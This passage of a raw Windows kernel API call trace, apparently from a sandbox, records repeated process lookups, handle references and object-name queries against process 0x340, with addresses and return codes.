0x0 [0264.917] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.917] PsReleaseProcessExitSynchronization () returned 0x2 [0264.917] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40059 [0264.917] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.917] ObfDereferenceObject (Object=0xffffe000804d4660) returned 0x800f [0264.917] IoCompleteRequest () returned 0x0 [0264.917] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.917] PsAcquireProcessExitSynchronization () returned 0x0 [0264.917] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.917] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069895e20, HandleInformation=0x0) returned 0x0 [0264.917] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.917] PsReleaseProcessExitSynchronization () returned 0x2 [0264.917] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40058 [0264.917] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.917] ObfDereferenceObject (Object=0xffffe00069895e20) returned 0x800f [0264.917] IoCompleteRequest () returned 0x0 [0264.917] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.918] PsAcquireProcessExitSynchronization () returned 0x0 [0264.918] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.918] ObReferenceObjectByHandle (in: Handle=0x264, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006984cf20, HandleInformation=0x0) returned 0x0 [0264.918] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.918] PsReleaseProcessExitSynchronization () returned 0x2 [0264.918] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40057 [0264.918] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.918] ObfDereferenceObject (Object=0xffffe0006984cf20) returned 0x800b [0264.918] IoCompleteRequest () returned 0x0 [0264.918] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.918] PsAcquireProcessExitSynchronization () returned 0x0 [0264.918] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.918] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000804d42d0, HandleInformation=0x0) returned 0x0 [0264.918] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.918] PsReleaseProcessExitSynchronization () returned 0x2 [0264.918] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40056 [0264.919] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.919] ObfDereferenceObject (Object=0xffffe000804d42d0) returned 0x800f [0264.919] IoCompleteRequest () returned 0x0 [0264.919] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.919] PsAcquireProcessExitSynchronization () returned 0x0 [0264.919] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.919] ObReferenceObjectByHandle (in: Handle=0x280, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00072a33490, HandleInformation=0x0) returned 0x0 [0264.919] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.919] PsReleaseProcessExitSynchronization () returned 0x2 [0264.919] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40055 [0264.919] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.919] ObfDereferenceObject (Object=0xffffe00072a33490) returned 0x800f [0264.919] IoCompleteRequest () returned 0x0 [0264.919] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.919] PsAcquireProcessExitSynchronization () returned 0x0 [0264.919] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.919] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00072a33db0, HandleInformation=0x0) returned 0x0 [0264.919] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.919] PsReleaseProcessExitSynchronization () returned 0x2 [0264.919] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40054 [0264.919] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.919] ObfDereferenceObject (Object=0xffffe00072a33db0) returned 0x800c [0264.919] IoCompleteRequest () returned 0x0 [0264.919] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.919] PsAcquireProcessExitSynchronization () returned 0x0 [0264.919] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.919] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007a9fec20, HandleInformation=0x0) returned 0x0 [0264.919] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.919] PsReleaseProcessExitSynchronization () returned 0x2 [0264.919] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40053 [0264.919] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.919] ObfDereferenceObject (Object=0xffffe0007a9fec20) returned 0x800c [0264.919] IoCompleteRequest () returned 0x0 [0264.919] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.919] PsAcquireProcessExitSynchronization () returned 0x0 [0264.919] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.919] ObReferenceObjectByHandle (in: Handle=0x28c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00072a33320, HandleInformation=0x0) returned 0x0 [0264.919] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.919] PsReleaseProcessExitSynchronization () returned 0x2 [0264.919] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40052 [0264.919] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.919] ObfDereferenceObject (Object=0xffffe00072a33320) returned 0x800b [0264.920] IoCompleteRequest () returned 0x0 [0264.920] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.920] PsAcquireProcessExitSynchronization () returned 0x0 [0264.920] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.920] ObReferenceObjectByHandle (in: Handle=0x290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006989a310, HandleInformation=0x0) returned 0x0 [0264.920] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.920] PsReleaseProcessExitSynchronization () returned 0x2 [0264.920] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40051 [0264.920] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.920] ObfDereferenceObject (Object=0xffffe0006989a310) returned 0x800c [0264.920] IoCompleteRequest () returned 0x0 [0264.920] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.920] PsAcquireProcessExitSynchronization () returned 0x0 [0264.920] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.920] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006989c750, HandleInformation=0x0) returned 0x0 [0264.920] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.920] PsReleaseProcessExitSynchronization () returned 0x2 [0264.920] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40050 [0264.920] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.920] ObfDereferenceObject (Object=0xffffe0006989c750) returned 0x800f [0264.920] IoCompleteRequest () returned 0x0 [0264.920] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.920] PsAcquireProcessExitSynchronization () returned 0x0 [0264.920] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.920] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006989abf0, HandleInformation=0x0) returned 0x0 [0264.920] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.920] PsReleaseProcessExitSynchronization () returned 0x2 [0264.920] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4004f [0264.920] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.920] ObfDereferenceObject (Object=0xffffe0006989abf0) returned 0x800c [0264.920] IoCompleteRequest () returned 0x0 [0264.920] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.920] PsAcquireProcessExitSynchronization () returned 0x0 [0264.920] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.920] ObReferenceObjectByHandle (in: Handle=0x2a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006989c9f0, HandleInformation=0x0) returned 0x0 [0264.920] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.920] PsReleaseProcessExitSynchronization () returned 0x2 [0264.920] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4004e [0264.920] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.920] ObfDereferenceObject (Object=0xffffe0006989c9f0) returned 0x800c [0264.920] IoCompleteRequest () returned 0x0 [0264.921] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.921] PsAcquireProcessExitSynchronization () returned 0x0 [0264.921] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.921] ObReferenceObjectByHandle (in: Handle=0x2b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007c050ba0, HandleInformation=0x0) returned 0x0 [0264.921] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.921] PsReleaseProcessExitSynchronization () returned 0x2 [0264.921] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4004d [0264.921] ObQueryNameString (in: Object=0xffffe0007c050ba0, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.921] ObfDereferenceObject (Object=0xffffe0007c050ba0) returned 0x7fde [0264.921] IoCompleteRequest () returned 0x0 [0264.921] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.921] PsAcquireProcessExitSynchronization () returned 0x0 [0264.921] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.921] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.921] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.921] PsReleaseProcessExitSynchronization () returned 0x2 [0264.921] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4004c [0264.921] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.921] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff6 [0264.921] IoCompleteRequest () returned 0x0 [0264.921] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.921] PsAcquireProcessExitSynchronization () returned 0x0 [0264.921] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.921] ObReferenceObjectByHandle (in: Handle=0x2fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.921] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.921] PsReleaseProcessExitSynchronization () returned 0x2 [0264.921] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4004b [0264.921] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.921] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff5 [0264.921] IoCompleteRequest () returned 0x0 [0264.921] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.921] PsAcquireProcessExitSynchronization () returned 0x0 [0264.921] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.921] ObReferenceObjectByHandle (in: Handle=0x314, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007c05fa80, HandleInformation=0x0) returned 0x0 [0264.921] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.921] PsReleaseProcessExitSynchronization () returned 0x2 [0264.921] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4004a [0264.921] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.921] ObfDereferenceObject (Object=0xffffe0007c05fa80) returned 0x7fcf [0264.921] IoCompleteRequest () returned 0x0 [0264.921] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.921] PsAcquireProcessExitSynchronization () returned 0x0 [0264.921] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.921] ObReferenceObjectByHandle (in: Handle=0x31c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069913800, HandleInformation=0x0) returned 0x0 [0264.922] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.922] PsReleaseProcessExitSynchronization () returned 0x2 [0264.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40049 [0264.922] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.922] ObfDereferenceObject (Object=0xffffe00069913800) returned 0x800f [0264.922] IoCompleteRequest () returned 0x0 [0264.922] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.922] PsAcquireProcessExitSynchronization () returned 0x0 [0264.922] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.922] ObReferenceObjectByHandle (in: Handle=0x32c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698f59d0, HandleInformation=0x0) returned 0x0 [0264.922] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.922] PsReleaseProcessExitSynchronization () returned 0x2 [0264.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40048 [0264.922] ObQueryNameString (in: Object=0xffffe000698f59d0, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.922] ObfDereferenceObject (Object=0xffffe000698f59d0) returned 0x7fff [0264.922] IoCompleteRequest () returned 0x0 [0264.922] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.922] PsAcquireProcessExitSynchronization () returned 0x0 [0264.922] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.922] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698f5f20, HandleInformation=0x0) returned 0x0 [0264.922] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.922] PsReleaseProcessExitSynchronization () returned 0x2 [0264.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40047 [0264.922] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.922] ObfDereferenceObject (Object=0xffffe000698f5f20) returned 0x7fd8 [0264.922] IoCompleteRequest () returned 0x0 [0264.922] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.922] PsAcquireProcessExitSynchronization () returned 0x0 [0264.922] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.922] ObReferenceObjectByHandle (in: Handle=0x338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698f6f20, HandleInformation=0x0) returned 0x0 [0264.922] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.922] PsReleaseProcessExitSynchronization () returned 0x2 [0264.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40046 [0264.922] ObQueryNameString (in: Object=0xffffe000698f6f20, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.922] ObfDereferenceObject (Object=0xffffe000698f6f20) returned 0x7fff [0264.922] IoCompleteRequest () returned 0x0 [0264.922] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.922] PsAcquireProcessExitSynchronization () returned 0x0 [0264.922] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.922] ObReferenceObjectByHandle (in: Handle=0x340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698f6d10, HandleInformation=0x0) returned 0x0 [0264.922] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.922] PsReleaseProcessExitSynchronization () returned 0x2 [0264.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40045 [0264.922] ObQueryNameString (in: Object=0xffffe000698f6d10, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.922] ObfDereferenceObject (Object=0xffffe000698f6d10) returned 0x7fff [0264.923] IoCompleteRequest () returned 0x0 [0264.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.923] PsAcquireProcessExitSynchronization () returned 0x0 [0264.923] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.923] ObReferenceObjectByHandle (in: Handle=0x36c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698f8e80, HandleInformation=0x0) returned 0x0 [0264.923] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.923] PsReleaseProcessExitSynchronization () returned 0x2 [0264.923] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40044 [0264.923] ObQueryNameString (in: Object=0xffffe000698f8e80, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.923] ObfDereferenceObject (Object=0xffffe000698f8e80) returned 0x7fff [0264.923] IoCompleteRequest () returned 0x0 [0264.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.923] PsAcquireProcessExitSynchronization () returned 0x0 [0264.923] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.923] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698f7920, HandleInformation=0x0) returned 0x0 [0264.923] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.923] PsReleaseProcessExitSynchronization () returned 0x2 [0264.923] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40043 [0264.923] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.923] ObfDereferenceObject (Object=0xffffe000698f7920) returned 0x7fda [0264.923] IoCompleteRequest () returned 0x0 [0264.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.923] PsAcquireProcessExitSynchronization () returned 0x0 [0264.923] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.923] ObReferenceObjectByHandle (in: Handle=0x374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698f7a90, HandleInformation=0x0) returned 0x0 [0264.923] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.923] PsReleaseProcessExitSynchronization () returned 0x2 [0264.923] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40042 [0264.923] ObQueryNameString (in: Object=0xffffe000698f7a90, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.923] ObfDereferenceObject (Object=0xffffe000698f7a90) returned 0x7fff [0264.923] IoCompleteRequest () returned 0x0 [0264.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.923] PsAcquireProcessExitSynchronization () returned 0x0 [0264.923] KeStackAttachProcess 